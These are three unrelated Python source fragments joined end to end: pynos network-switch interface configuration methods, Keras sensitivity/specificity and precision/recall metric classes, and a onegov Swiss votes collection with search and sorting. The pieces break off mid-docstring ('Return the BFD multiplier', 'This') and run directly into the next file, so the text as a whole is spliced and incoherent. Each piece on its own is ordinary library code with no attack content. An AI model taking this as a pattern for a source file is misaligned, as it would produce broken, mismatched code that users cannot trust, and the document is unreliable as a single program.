donor_name (str): Interface name of the donor interface. get (bool): Get config instead of editing config. (True, False) callback (function): A function executed upon completion of the method. The only parameter passed to `callback` will be the ``ElementTree`` `config`. Returns: Return value of `callback`. Raises: KeyError: if `int_type`, `name`, `donor_type`, or `donor_name` is not passed. ValueError: if `int_type`, `name`, `donor_type`, or `donor_name` are invalid. Examples: >>> import pynos.device >>> switches = ['10.24.39.230'] >>> auth = ('admin', 'password') >>> for switch in switches: ... conn = (switch, '22') ... with pynos.device.Device(conn=conn, auth=auth) as dev: ... output = dev.interface.ip_address(int_type='loopback', ... name='1', ip_addr='4.4.4.4/32', rbridge_id='230') ... int_type = 'tengigabitethernet' ... name = '230/0/20' ... donor_type = 'loopback' ... donor_name = '1' ... output = dev.interface.disable_switchport(inter_type= ... int_type, inter=name) ... output = dev.interface.ip_unnumbered(int_type=int_type, ... name=name, donor_type=donor_type, donor_name=donor_name) ... output = dev.interface.ip_unnumbered(int_type=int_type, ... name=name, donor_type=donor_type, donor_name=donor_name, ... get=True) ... output = dev.interface.ip_unnumbered(int_type=int_type, ... name=name, donor_type=donor_type, donor_name=donor_name, ... delete=True) ... output = dev.interface.ip_address(int_type='loopback', ... name='1', ip_addr='4.4.4.4/32', rbridge_id='230', ... delete=True) ... output = dev.interface.ip_unnumbered(int_type='hodor', ... donor_name=donor_name, donor_type=donor_type, name=name) ... 
# doctest: +IGNORE_EXCEPTION_DETAIL Traceback (most recent call last): ValueError """ kwargs['ip_donor_interface_name'] = kwargs.pop('donor_name') kwargs['ip_donor_interface_type'] = kwargs.pop('donor_type') kwargs['delete'] = kwargs.pop('delete', False) callback = kwargs.pop('callback', self._callback) valid_int_types = ['gigabitethernet', 'tengigabitethernet', 'fortygigabitethernet', 'hundredgigabitethernet'] if kwargs['int_type'] not in valid_int_types: raise ValueError('int_type must be one of: %s' % repr(valid_int_types)) unnumbered_type = self._ip_unnumbered_type(**kwargs) unnumbered_name = self._ip_unnumbered_name(**kwargs) if kwargs.pop('get', False): return self._get_ip_unnumbered(unnumbered_type, unnumbered_name) config = pynos.utilities.merge_xml(unnumbered_type, unnumbered_name) return callback(config) def _ip_unnumbered_name(self, **kwargs): """Return the `ip unnumbered` donor name XML. You should not use this method. You probably want `Interface.ip_unnumbered`. Args: int_type (str): Type of interface. (gigabitethernet, tengigabitethernet etc). delete (bool): Remove the configuration if ``True``. ip_donor_interface_name (str): The donor interface name (1, 2, etc) Returns: XML to be passed to the switch. Raises: None """ method_name = 'interface_%s_ip_ip_config_unnumbered_ip_donor_'\ 'interface_name' % kwargs['int_type'] ip_unnumbered_name = getattr(self._interface, method_name) config = ip_unnumbered_name(**kwargs) if kwargs['delete']: tag = 'ip-donor-interface-name' config.find('.//*%s' % tag).set('operation', 'delete') return config def _ip_unnumbered_type(self, **kwargs): """Return the `ip unnumbered` donor type XML. You should not use this method. You probably want `Interface.ip_unnumbered`. Args: int_type (str): Type of interface. (gigabitethernet, tengigabitethernet etc). delete (bool): Remove the configuration if ``True``. ip_donor_interface_type (str): The donor interface type (loopback) Returns: XML to be passed to the switch. 
Raises: None """ method_name = 'interface_%s_ip_ip_config_unnumbered_ip_donor_'\ 'interface_type' % kwargs['int_type'] ip_unnumbered_type = getattr(self._interface, method_name) config = ip_unnumbered_type(**kwargs) if kwargs['delete']: tag = 'ip-donor-interface-type' config.find('.//*%s' % tag).set('operation', 'delete') return config def _get_ip_unnumbered(self, unnumbered_type, unnumbered_name): """Get and merge the `ip unnumbered` config from an interface. You should not use this method. You probably want `Interface.ip_unnumbered`. Args: unnumbered_type: XML document with the XML to get the donor type. unnumbered_name: XML document with the XML to get the donor name. Returns: Merged XML document. Raises: None """ unnumbered_type = self._callback(unnumbered_type, handler='get_config') unnumbered_name = self._callback(unnumbered_name, handler='get_config') unnumbered_type = pynos.utilities.return_xml(str(unnumbered_type)) unnumbered_name = pynos.utilities.return_xml(str(unnumbered_name)) return pynos.utilities.merge_xml(unnumbered_type, unnumbered_name) def anycast_mac(self, **kwargs): """Configure an anycast MAC address. Args: int_type (str): Type of interface. (gigabitethernet, tengigabitethernet etc). mac (str): MAC address to configure (example: '0011.2233.4455'). delete (bool): True is the IP address is added and False if its to be deleted (True, False). Default value will be False if not specified. get (bool): Get config instead of editing config. (True, False) callback (function): A function executed upon completion of the method. The only parameter passed to `callback` will be the ``ElementTree`` `config`. Returns: Return value of `callback`. Raises: KeyError: if `mac` is not passed. Examples: >>> import pynos.device >>> switches = ['10.24.39.230'] >>> auth = ('admin', 'password') >>> for switch in switches: ... conn = (switch, '22') ... with pynos.device.Device(conn=conn, auth=auth) as dev: ... output = dev.services.vrrp(ip_version='6', ... 
enabled=True, rbridge_id='230') ... output = dev.services.vrrp(enabled=True, ... rbridge_id='230') ... output = dev.services.vrrp(ip_version='6', ... enabled=False, rbridge_id='230') ... output = dev.services.vrrp(enabled=False, ... rbridge_id='230') ... output = dev.interface.anycast_mac(rbridge_id='230', ... mac='0011.2233.4455') ... output = dev.interface.anycast_mac(rbridge_id='230', ... mac='0011.2233.4455', get=True) ... output = dev.interface.anycast_mac(rbridge_id='230', ... mac='0011.2233.4455', delete=True) ... output = dev.services.vrrp(ip_version='6', enabled=True, ... rbridge_id='230') ... output = dev.services.vrrp(enabled=True, ... rbridge_id='230') """ callback = kwargs.pop('callback', self._callback) anycast_mac = getattr(self._rbridge, 'rbridge_id_ip_static_ag_ip_' 'config_anycast_gateway_mac_ip_anycast_' 'gateway_mac') config = anycast_mac(rbridge_id=kwargs.pop('rbridge_id', '1'), ip_anycast_gateway_mac=kwargs.pop('mac')) if kwargs.pop('get', False): return callback(config, handler='get_config') if kwargs.pop('delete', False): config.find('.//*anycast-gateway-mac').set('operation', 'delete') return callback(config) def bfd(self, **kwargs): """Configure BFD for Interface. Args: name (str): name of the interface to configure (230/0/1 etc) int_type (str): interface type (gigabitethernet etc) tx (str): BFD transmit interval in milliseconds (300, 500, etc) rx (str): BFD receive interval in milliseconds (300, 500, etc) multiplier (str): BFD multiplier. (3, 7, 5, etc) delete (bool): True if BFD configuration should be deleted. Default value will be False if not specified. get (bool): Get config instead of editing config. (True, False) callback (function): A function executed upon completion of the method. The only parameter passed to `callback` will be the ``ElementTree`` `config`. Returns: Return value of `callback`. Raises: KeyError: if `tx`, `rx`, or `multiplier` is not passed. 
Examples: >>> import pynos.device >>> switches = ['10.24.39.230'] >>> auth = ('admin', 'password') >>> for switch in switches: ... conn = (switch, '22') ... with pynos.device.Device(conn=conn, auth=auth) as dev: ... output = dev.interface.bfd(name='230/0/4', rx='300', ... tx='300', multiplier='3', int_type='tengigabitethernet') ... output = dev.interface.bfd(name='230/0/4', rx='300', ... tx='300', multiplier='3', ... int_type='tengigabitethernet', get=True) ... output = dev.interface.bfd(name='230/0/4', rx='300', ... tx='300', multiplier='3', ... int_type='tengigabitethernet', delete=True) """ int_type = str(kwargs.pop('int_type').lower()) kwargs['name'] = str(kwargs.pop('name')) kwargs['min_tx'] = kwargs.pop('tx') kwargs['min_rx'] = kwargs.pop('rx') kwargs['delete'] = kwargs.pop('delete', False) callback = kwargs.pop('callback', self._callback) valid_int_types = ['gigabitethernet', 'tengigabitethernet', 'fortygigabitethernet', 'hundredgigabitethernet'] if int_type not in valid_int_types: raise ValueError('int_type must be one of: %s' % repr(valid_int_types)) kwargs['int_type'] = int_type bfd_tx = self._bfd_tx(**kwargs) bfd_rx = self._bfd_rx(**kwargs) bfd_multiplier = self._bfd_multiplier(**kwargs) if kwargs.pop('get', False): return self._get_bfd(bfd_tx, bfd_rx, bfd_multiplier) config = pynos.utilities.merge_xml(bfd_tx, bfd_rx) config = pynos.utilities.merge_xml(config, bfd_multiplier) return callback(config) def _bfd_tx(self, **kwargs): """Return the BFD minimum transmit interval XML. You should not use this method. You probably want `BGP.bfd`. Args: min_tx (str): BFD transmit interval in milliseconds (300, 500, etc) delete (bool): Remove the configuration if ``True``. Returns: XML to be passed to the switch. 
Raises: None """ int_type = kwargs['int_type'] method_name = 'interface_%s_bfd_interval_min_tx' % int_type bfd_tx = getattr(self._interface, method_name) config = bfd_tx(**kwargs) if kwargs['delete']: tag = 'min-tx' config.find('.//*%s' % tag).set('operation', 'delete') return config def _bfd_rx(self, **kwargs): """Return the BFD minimum receive interval XML. You should not use this method. You probably want `BGP.bfd`. Args: min_rx (str): BFD receive interval in milliseconds (300, 500, etc) delete (bool): Remove the configuration if ``True``. Returns: XML to be passed to the switch. Raises: None """ int_type = kwargs['int_type'] method_name = 'interface_%s_bfd_interval_min_rx' % int_type bfd_rx = getattr(self._interface, method_name) config = bfd_rx(**kwargs) if kwargs['delete']: tag = 'min-rx' config.find('.//*%s' % tag).set('operation', 'delete') pass return config def _bfd_multiplier(self, **kwargs): """Return the BFD multiplier
      same rank as `y_true`, and must be broadcastable to `y_true`.

    Returns:
      Update op.
    """
    # Accumulate all four confusion-matrix counters in one pass over the
    # batch; each counter holds one slot per threshold.
    return metrics_utils.update_confusion_matrix_variables(
        {
            metrics_utils.ConfusionMatrix.TRUE_POSITIVES:
                self.true_positives,
            metrics_utils.ConfusionMatrix.TRUE_NEGATIVES:
                self.true_negatives,
            metrics_utils.ConfusionMatrix.FALSE_POSITIVES:
                self.false_positives,
            metrics_utils.ConfusionMatrix.FALSE_NEGATIVES:
                self.false_negatives,
        },
        y_true,
        y_pred,
        thresholds=self.thresholds,
        sample_weight=sample_weight)

  def reset_states(self):
    # Zero every confusion-matrix accumulator (one zero per threshold).
    num_thresholds = len(self.thresholds)
    K.batch_set_value(
        [(v, np.zeros((num_thresholds,))) for v in self.variables])


@keras_export('keras.metrics.SensitivityAtSpecificity')
class SensitivityAtSpecificity(SensitivitySpecificityBase):
  """Computes the sensitivity at a given specificity.

  `Sensitivity` measures the proportion of actual positives that are correctly
  identified as such (tp / (tp + fn)).
  `Specificity` measures the proportion of actual negatives that are correctly
  identified as such (tn / (tn + fp)).

  This metric creates four local variables, `true_positives`,
  `true_negatives`, `false_positives` and `false_negatives` that are used to
  compute the sensitivity at the given specificity. The threshold for the
  given specificity value is computed and used to evaluate the corresponding
  sensitivity.

  If `sample_weight` is `None`, weights default to 1.
  Use `sample_weight` of 0 to mask values.

  For additional information about specificity and sensitivity, see the
  following: https://en.wikipedia.org/wiki/Sensitivity_and_specificity

  Usage:

  >>> m = tf.keras.metrics.SensitivityAtSpecificity(0.4, num_thresholds=1)
  >>> _ = m.update_state([0, 0, 1, 1], [0, 0.5, 0.3, 0.9])
  >>> m.result().numpy()
  0.5

  >>> m.reset_states()
  >>> _ = m.update_state([0, 0, 1, 1], [0, 0.5, 0.3, 0.9],
  ...                    sample_weight=[1, 0, 0, 1])
  >>> m.result().numpy()
  1.0

  Usage with tf.keras API:

  ```python
  model = tf.keras.Model(inputs, outputs)
  model.compile(
      'sgd',
      loss='mse',
      metrics=[tf.keras.metrics.SensitivityAtSpecificity()])
  ```
  """

  def __init__(self, specificity, num_thresholds=200, name=None, dtype=None):
    """Creates a `SensitivityAtSpecificity` instance.

    Args:
      specificity: A scalar value in range `[0, 1]`.
      num_thresholds: (Optional) Defaults to 200. The number of thresholds to
        use for matching the given specificity.
      name: (Optional) string name of the metric instance.
      dtype: (Optional) data type of the metric result.
    """
    if specificity < 0 or specificity > 1:
      raise ValueError('`specificity` must be in the range [0, 1].')
    self.specificity = specificity
    self.num_thresholds = num_thresholds
    super(SensitivityAtSpecificity, self).__init__(
        specificity, num_thresholds=num_thresholds, name=name, dtype=dtype)

  def result(self):
    # Calculate specificities at all the thresholds.
    specificities = math_ops.div_no_nan(
        self.true_negatives, self.true_negatives + self.false_positives)

    # Find the index of the threshold where the specificity is closest to the
    # given specificity.
    min_index = math_ops.argmin(
        math_ops.abs(specificities - self.value), axis=0)
    min_index = math_ops.cast(min_index, dtypes.int32)

    # Compute sensitivity at that index.
    return math_ops.div_no_nan(
        self.true_positives[min_index],
        self.true_positives[min_index] + self.false_negatives[min_index])

  def get_config(self):
    config = {
        'num_thresholds': self.num_thresholds,
        'specificity': self.specificity
    }
    base_config = super(SensitivityAtSpecificity, self).get_config()
    return dict(list(base_config.items()) + list(config.items()))


@keras_export('keras.metrics.SpecificityAtSensitivity')
class SpecificityAtSensitivity(SensitivitySpecificityBase):
  """Computes the specificity at a given sensitivity.

  `Sensitivity` measures the proportion of actual positives that are correctly
  identified as such (tp / (tp + fn)).
  `Specificity` measures the proportion of actual negatives that are correctly
  identified as such (tn / (tn + fp)).

  This metric creates four local variables, `true_positives`,
  `true_negatives`, `false_positives` and `false_negatives` that are used to
  compute the specificity at the given sensitivity. The threshold for the
  given sensitivity value is computed and used to evaluate the corresponding
  specificity.

  If `sample_weight` is `None`, weights default to 1.
  Use `sample_weight` of 0 to mask values.

  For additional information about specificity and sensitivity, see the
  following: https://en.wikipedia.org/wiki/Sensitivity_and_specificity

  Usage:

  >>> m = tf.keras.metrics.SpecificityAtSensitivity(0.8, num_thresholds=1)
  >>> _ = m.update_state([0, 0, 1, 1], [0, 0.5, 0.3, 0.9])
  >>> m.result().numpy()
  1.0

  >>> m.reset_states()
  >>> _ = m.update_state([0, 0, 1, 1], [0, 0.5, 0.3, 0.9],
  ...                    sample_weight=[1, 0, 0, 1])
  >>> m.result().numpy()
  1.0

  Usage with tf.keras API:

  ```python
  model = tf.keras.Model(inputs, outputs)
  model.compile(
      'sgd',
      loss='mse',
      metrics=[tf.keras.metrics.SpecificityAtSensitivity()])
  ```
  """

  def __init__(self, sensitivity, num_thresholds=200, name=None, dtype=None):
    """Creates a `SpecificityAtSensitivity` instance.

    Args:
      sensitivity: A scalar value in range `[0, 1]`.
      num_thresholds: (Optional) Defaults to 200. The number of thresholds to
        use for matching the given sensitivity.
      name: (Optional) string name of the metric instance.
      dtype: (Optional) data type of the metric result.
    """
    if sensitivity < 0 or sensitivity > 1:
      raise ValueError('`sensitivity` must be in the range [0, 1].')
    self.sensitivity = sensitivity
    self.num_thresholds = num_thresholds
    super(SpecificityAtSensitivity, self).__init__(
        sensitivity, num_thresholds=num_thresholds, name=name, dtype=dtype)

  def result(self):
    # Calculate sensitivities at all the thresholds.
    sensitivities = math_ops.div_no_nan(
        self.true_positives, self.true_positives + self.false_negatives)

    # Find the index of the threshold where the sensitivity is closest to the
    # requested value.
    min_index = math_ops.argmin(
        math_ops.abs(sensitivities - self.value), axis=0)
    min_index = math_ops.cast(min_index, dtypes.int32)

    # Compute specificity at that index.
    return math_ops.div_no_nan(
        self.true_negatives[min_index],
        self.true_negatives[min_index] + self.false_positives[min_index])

  def get_config(self):
    config = {
        'num_thresholds': self.num_thresholds,
        'sensitivity': self.sensitivity
    }
    base_config = super(SpecificityAtSensitivity, self).get_config()
    return dict(list(base_config.items()) + list(config.items()))


@keras_export('keras.metrics.PrecisionAtRecall')
class PrecisionAtRecall(SensitivitySpecificityBase):
  """Computes the precision at a given recall.

  This metric creates four local variables, `true_positives`,
  `true_negatives`, `false_positives` and `false_negatives` that are used to
  compute the precision at the given recall. The threshold for the given
  recall value is computed and used to evaluate the corresponding precision.

  If `sample_weight` is `None`, weights default to 1.
  Use `sample_weight` of 0 to mask values.

  Usage:

  >>> m = tf.keras.metrics.PrecisionAtRecall(0.8, num_thresholds=1)
  >>> _ = m.update_state([0, 0, 1, 1], [0, 0.5, 0.3, 0.9])
  >>> m.result().numpy()
  1.0

  >>> m.reset_states()
  >>> _ = m.update_state([0, 0, 1, 1], [0, 0.5, 0.3, 0.9],
  ...                    sample_weight=[1, 0, 0, 1])
  >>> m.result().numpy()
  1.0

  Usage with tf.keras API:

  ```python
  model = tf.keras.Model(inputs, outputs)
  model.compile(
      'sgd',
      loss='mse',
      metrics=[tf.keras.metrics.PrecisionAtRecall(recall=0.8)])
  ```
  """

  def __init__(self, recall, num_thresholds=200, name=None, dtype=None):
    """Creates a `PrecisionAtRecall` instance.

    Args:
      recall: A scalar value in range `[0, 1]`.
      num_thresholds: (Optional) Defaults to 200. The number of thresholds to
        use for matching the given recall.
      name: (Optional) string name of the metric instance.
      dtype: (Optional) data type of the metric result.
    """
    if recall < 0 or recall > 1:
      raise ValueError('`recall` must be in the range [0, 1].')
    self.recall = recall
    self.num_thresholds = num_thresholds
    super(PrecisionAtRecall, self).__init__(
        value=recall,
        num_thresholds=num_thresholds,
        name=name,
        dtype=dtype)

  def result(self):
    # Calculate recall at all the thresholds.
    recalls = math_ops.div_no_nan(
        self.true_positives, self.true_positives + self.false_negatives)

    # Find the index of the threshold where the recall is closest to the
    # requested value.
    min_index = math_ops.argmin(
        math_ops.abs(recalls - self.value), axis=0)
    min_index = math_ops.cast(min_index, dtypes.int32)

    # Compute precision at that index.
    return math_ops.div_no_nan(
        self.true_positives[min_index],
        self.true_positives[min_index] + self.false_positives[min_index])

  def get_config(self):
    config = {'num_thresholds': self.num_thresholds, 'recall': self.recall}
    base_config = super(PrecisionAtRecall, self).get_config()
    return dict(list(base_config.items()) + list(config.items()))


@keras_export('keras.metrics.RecallAtPrecision')
class RecallAtPrecision(SensitivitySpecificityBase):
  """Computes the maximally achievable recall at a required precision.

  For a given score-label-distribution the required precision might not
  be achievable, in this case 0.0 is returned as recall.

  This metric creates four local variables, `true_positives`,
  `true_negatives`, `false_positives` and `false_negatives` that are used to
  compute the recall at the given precision. The threshold for the given
  precision value is computed and used to evaluate the corresponding recall.

  If `sample_weight` is `None`, weights default to 1.
  Use `sample_weight` of 0 to mask values.

  Usage:

  >>> m = tf.keras.metrics.RecallAtPrecision(0.8, num_thresholds=1)
  >>> _ = m.update_state([0, 0, 1, 1], [0, 0.5, 0.3, 0.9])
  >>> m.result().numpy()
  0.5

  >>> m.reset_states()
  >>> _ = m.update_state([0, 0, 1, 1], [0, 0.5, 0.3, 0.9],
  ...                    sample_weight=[1, 0, 0, 1])
  >>> m.result().numpy()
  1.0

  Usage with tf.keras API:

  ```python
  model = tf.keras.Model(inputs, outputs)
  model.compile(
      'sgd',
      loss='mse',
      metrics=[tf.keras.metrics.RecallAtPrecision(precision=0.8)])
  ```
  """

  def __init__(self, precision, num_thresholds=200, name=None, dtype=None):
    """Creates a `RecallAtPrecision` instance.

    Args:
      precision: A scalar value in range `[0, 1]`.
      num_thresholds: (Optional) Defaults to 200. The number of thresholds to
        use for matching the given precision.
      name: (Optional) string name of the metric instance.
      dtype: (Optional) data type of the metric result.
    """
    if precision < 0 or precision > 1:
      raise ValueError('`precision` must be in the range [0, 1].')
    self.precision = precision
    self.num_thresholds = num_thresholds
    super(RecallAtPrecision, self).__init__(
        value=precision,
        num_thresholds=num_thresholds,
        name=name,
        dtype=dtype)

  def result(self):
    # Calculate precision and recall at all the thresholds.
    # All recalls are computed, because they are not a monotonic function of
    # precision and we want to search for the highest feasible recall.
    precisions = math_ops.div_no_nan(
        self.true_positives, self.true_positives + self.false_positives)
    recalls = math_ops.div_no_nan(
        self.true_positives, self.true_positives + self.false_negatives)
    # Find best recall where the precision is as good as required.
    feasible = array_ops.where(math_ops.greater_equal(precisions, self.value))
    feasible_exists = math_ops.greater(array_ops.size(feasible), 0)
    best_recall = control_flow_ops.cond(
        feasible_exists,
        lambda: math_ops.reduce_max(array_ops.gather(recalls, feasible)),
        lambda: 0.0)
    return best_recall

  def get_config(self):
    config = {'num_thresholds': self.num_thresholds,
              'precision': self.precision}
    base_config = super(RecallAtPrecision, self).get_config()
    return dict(list(base_config.items()) + list(config.items()))


@keras_export('keras.metrics.AUC')
class AUC(Metric):
  """Computes the approximate AUC (Area under the curve) via a Riemann sum.

  This
from cached_property import cached_property
from csv import writer
from datetime import date
from decimal import Decimal
from decimal import InvalidOperation
from onegov.core.collection import Pagination
from onegov.swissvotes.models import ColumnMapperDataset
from onegov.swissvotes.models import PolicyArea
from onegov.swissvotes.models import SwissVote
from sqlalchemy import func
from sqlalchemy import or_
from xlsxwriter.workbook import Workbook


class SwissVoteCollection(Pagination):

    """ A collection of votes.

    Supports pagination, filtering, sorting, exporting (CSV/XLSX) and batch
    adding/updating.

    """

    # Number of votes per page.
    batch_size = 20
    # Sorting used when no explicit sorting is requested.
    initial_sort_by = 'date'
    initial_sort_order = 'descending'
    # Order used the first time a non-initial column is sorted.
    default_sort_order = 'ascending'

    # Whitelists for user-supplied sort parameters.
    SORT_BYS = (
        'date',
        'legal_form',
        'result',
        'result_people_yeas_p',
        'title',
        'result_turnout'
    )
    SORT_ORDERS = ('ascending', 'descending')

    def __init__(
        self,
        app,
        page=None,
        from_date=None,
        to_date=None,
        legal_form=None,
        result=None,
        policy_area=None,
        term=None,
        full_text=None,
        position_federal_council=None,
        position_national_council=None,
        position_council_of_states=None,
        sort_by=None,
        sort_order=None
    ):
        self.app = app
        self.session = app.session()
        self.page = page
        self.from_date = from_date
        self.to_date = to_date
        self.legal_form = legal_form
        self.result = result
        self.policy_area = policy_area
        self.term = term
        self.full_text = full_text
        self.position_federal_council = position_federal_council
        self.position_national_council = position_national_council
        self.position_council_of_states = position_council_of_states
        self.sort_by = sort_by
        self.sort_order = sort_order

    def add(self, **kwargs):
        """ Adds a new vote and flushes the session so generated values are
        available on the returned instance.

        """
        vote = SwissVote(**kwargs)
        self.session.add(vote)
        self.session.flush()
        return vote

    def subset(self):
        # Pagination hook: the paginated subset is the filtered query.
        return self.query()

    def __eq__(self, other):
        # Two collections are equal when page, every filter and the sorting
        # match; list-valued filters compare order-insensitively (as sets).
        return (
            (self.page or 0) == (other.page or 0) and
            (self.from_date or None) == (other.from_date or None) and
            (self.to_date or None) == (other.to_date or None) and
            set(self.legal_form or []) == set(other.legal_form or []) and
            set(self.result or []) == set(other.result or []) and
            set(self.policy_area or []) == set(other.policy_area or []) and
            (self.term or None) == (other.term or None) and
            (self.full_text or None) == (other.full_text or None) and
            (
                (self.position_federal_council or []) ==
                (other.position_federal_council or [])
            ) and (
                (self.position_national_council or []) ==
                (other.position_national_council or [])
            ) and (
                (self.position_council_of_states or []) ==
                (other.position_council_of_states or [])
            ) and
            (self.sort_by or None) == (other.sort_by or None) and
            (self.sort_order or None) == (other.sort_order or None)
        )

    def default(self):
        """ Returns the votes unfiltered and ordered by default. """

        return self.__class__(self.app)

    @property
    def page_index(self):
        """ The current page. """

        return self.page or 0

    def page_by_index(self, page):
        """ Returns the requested page. """

        return self.__class__(
            self.app,
            page=page,
            from_date=self.from_date,
            to_date=self.to_date,
            legal_form=self.legal_form,
            result=self.result,
            policy_area=self.policy_area,
            term=self.term,
            full_text=self.full_text,
            position_federal_council=self.position_federal_council,
            position_national_council=self.position_national_council,
            position_council_of_states=self.position_council_of_states,
            sort_by=self.sort_by,
            sort_order=self.sort_order
        )

    @property
    def current_sort_by(self):
        """ Returns the currently used sorting key.

        Defaults to a reasonable value.

        """
        if self.sort_by in self.SORT_BYS:
            return self.sort_by
        return self.initial_sort_by

    @property
    def current_sort_order(self):
        """ Returns the currently used sorting order.

        Defaults to a reasonable value.

        """
        if self.sort_by in self.SORT_BYS:
            if self.sort_order in self.SORT_ORDERS:
                return self.sort_order
            if self.sort_by == self.initial_sort_by:
                return self.initial_sort_order
            return self.default_sort_order
        return self.initial_sort_order

    def sort_order_by_key(self, sort_by):
        """ Returns the sort order by key.

        Defaults to 'unsorted'.

        """
        if self.current_sort_by == sort_by:
            return self.current_sort_order
        return 'unsorted'

    def by_order(self, sort_by):
        """ Returns the votes ordered by the given key.

        Sorting by the currently active key toggles the order.

        """
        sort_order = self.default_sort_order
        if sort_by == self.current_sort_by:
            if self.current_sort_order == 'ascending':
                sort_order = 'descending'
            else:
                sort_order = 'ascending'
        return self.__class__(
            self.app,
            page=None,
            from_date=self.from_date,
            to_date=self.to_date,
            legal_form=self.legal_form,
            result=self.result,
            policy_area=self.policy_area,
            term=self.term,
            full_text=self.full_text,
            position_federal_council=self.position_federal_council,
            position_national_council=self.position_national_council,
            position_council_of_states=self.position_council_of_states,
            sort_by=sort_by,
            sort_order=sort_order
        )

    @property
    def order_by(self):
        """ Returns an SqlAlchemy expression for ordering queries based
        on the current sorting key and ordering.

        """
        if self.current_sort_by == 'title':
            from onegov.core.orm.func import unaccent
            # Sort accent-insensitively on the locale-appropriate title.
            if self.app.session_manager.current_locale == 'fr_CH':
                result = unaccent(SwissVote.short_title_fr)
            else:
                result = unaccent(SwissVote.short_title_de)
        else:
            # Prefer the private column (e.g. `_result`) over a hybrid
            # attribute of the same public name.
            result = (
                getattr(SwissVote, f'_{self.current_sort_by}', None)
                or getattr(SwissVote, self.current_sort_by, None)
            )
            if not result:
                raise NotImplementedError()
        if self.current_sort_order == 'descending':
            result = result.desc()
        return result

    @property
    def offset(self):
        """ The current position in the batch. """

        return (self.page or 0) * self.batch_size

    @property
    def previous(self):
        """ The previous page. """

        if (self.page or 0) - 1 >= 0:
            return self.page_by_index((self.page or 0) - 1)

    @property
    def next(self):
        """ The next page. """

        if (self.page or 0) + 1 < self.pages_count:
            return self.page_by_index((self.page or 0) + 1)

    @property
    def term_expression(self):
        """ Returns the current search term transformed to use within
        Postgres ``to_tsquery`` function.

        Removes all unwanted characters, replaces prefix matching, joins
        word together using FOLLOWED BY.
        """

        def cleanup(text):
            # Keep only alphanumerics plus ',' and '.'; a trailing '*'
            # becomes the Postgres prefix-match operator ':*'.
            result = ''.join((c for c in text if c.isalnum() or c in ',.'))
            return f'{result}:*' if text.endswith('*') else result

        parts = [cleanup(part) for part in (self.term or '').split()]
        return ' <-> '.join([part for part in parts if part])

    @property
    def term_filter_numeric(self):
        """ Returns a list of SqlAlchemy filter statements matching possible
        numeric attributes based on the term.

        """
        result = []
        if self.term:
            for part in self.term.split():
                if part.replace('.', '', 1).isnumeric():
                    number = Decimal(part)
                    result.append(SwissVote.bfs_number == number)
                if part.replace('.', '', 1).replace('_', '', 1).isnumeric():
                    result.append(SwissVote.procedure_number == part)
        return result

    @property
    def term_filter_text(self):
        """ Returns a list of SqlAlchemy filter statements matching possible
        fulltext attributes based on the term.

        """
        term = self.term_expression
        if not term:
            return []

        def match(column, language='german'):
            return column.op('@@')(func.to_tsquery(language, term))

        def match_convert(column, language='german'):
            return match(func.to_tsvector(language, column), language)

        if not self.full_text:
            # Title/keyword search only.
            return [
                match_convert(SwissVote.title_de),
                match_convert(SwissVote.title_fr, 'french'),
                match_convert(SwissVote.short_title_de),
                match_convert(SwissVote.short_title_fr, 'french'),
                match_convert(SwissVote.keyword),
            ]
        # Full-text search additionally covers initiators and the
        # precomputed searchable text columns.
        return [
            match_convert(SwissVote.title_de),
            match_convert(SwissVote.title_fr, 'french'),
            match_convert(SwissVote.short_title_de),
            match_convert(SwissVote.short_title_fr, 'french'),
            match_convert(SwissVote.keyword),
            match_convert(SwissVote.initiator),
            match(SwissVote.searchable_text_de_CH),
            match(SwissVote.searchable_text_fr_CH, 'french'),
        ]

    @property
    def term_filter(self):
        """ Returns a list of SqlAlchemy filter statements based on the
        search term.

        """
        return self.term_filter_numeric + self.term_filter_text

    def query(self):
        """ Returns the votes matching to the current filters and order. """

        query = self.session.query(SwissVote)

        def in_or_none(column, values, extra={}):
            # NOTE(review): mutable default `extra={}` is safe here because
            # it is never mutated, but it is a known Python pitfall.
            # `extra` maps a selected value to an additional equivalent code
            # that should match too; -1 also matches NULL.
            values = values + [x for y, x in extra.items() if y in values]
            statement = column.in_(values)
            if -1 in values:
                statement = or_(statement, column.is_(None))
            return statement

        if self.from_date:
            query = query.filter(SwissVote.date >= self.from_date)
        if self.to_date:
            query = query.filter(SwissVote.date <= self.to_date)
        if self.legal_form:
            query = query.filter(SwissVote._legal_form.in_(self.legal_form))
        if self.result:
            # `== None` is intentional: SQLAlchemy renders it as IS NULL.
            query = query.filter(or_(
                SwissVote._result.in_(self.result),
                SwissVote._result == None,
            ))
        if self.policy_area:
            # Split the selected descriptors by level and match any of the
            # three descriptor slots per level.
            levels = [[], [], []]
            for area in self.policy_area:
                area = PolicyArea(area)
                if area.level == 1:
                    levels[0].append(area.descriptor_decimal)
                if area.level == 2:
                    levels[1].append(area.descriptor_decimal)
                if area.level == 3:
                    levels[2].append(area.descriptor_decimal)
            if levels[0]:
                query = query.filter(
                    or_(
                        SwissVote.descriptor_1_level_1.in_(levels[0]),
                        SwissVote.descriptor_2_level_1.in_(levels[0]),
                        SwissVote.descriptor_3_level_1.in_(levels[0])
                    )
                )
            if levels[1]:
                query = query.filter(
                    or_(
                        SwissVote.descriptor_1_level_2.in_(levels[1]),
                        SwissVote.descriptor_2_level_2.in_(levels[1]),
                        SwissVote.descriptor_3_level_2.in_(levels[1])
                    )
                )
            if levels[2]:
                query = query.filter(
                    or_(
                        SwissVote.descriptor_1_level_3.in_(levels[2]),
                        SwissVote.descriptor_2_level_3.in_(levels[2]),
                        SwissVote.descriptor_3_level_3.in_(levels[2])
                    )
                )
        if self.term:
            query = query.filter(or_(*self.term_filter))
        if self.position_federal_council:
            query = query.filter(
                in_or_none(
                    SwissVote._position_federal_council,
                    self.position_federal_council,
                    {1: 9, 2: 8}
                )
            )
        if self.position_national_council:
            query = query.filter(
                in_or_none(
                    SwissVote._position_national_council,
                    self.position_national_council,
                    {1: 9, 2: 8}
                )
            )
        if self.position_council_of_states:
            query = query.filter(
                in_or_none(
                    SwissVote._position_council_of_states,
                    self.position_council_of_states,
                    {1: 9, 2: 8}
                )
            )

        # Secondary sort on BFS number keeps the ordering deterministic.
        query = query.order_by(
            self.order_by,
            SwissVote.bfs_number.desc()
        )

        return query

    def by_bfs_number(self, bfs_number):
        """ Returns the vote with the given BFS number. """
        try:
            bfs_number = Decimal(bfs_number)
        except InvalidOperation:
            return None
        query = self.query().filter(SwissVote.bfs_number == bfs_number)
        return query.first()

    @cached_property
    def available_descriptors(self):
        """ Returns a list of the used descriptor values (level 1-3). """

        query = self.session.query
        return [
            set([
                x[0] for x in query(SwissVote.descriptor_1_level_1).union(
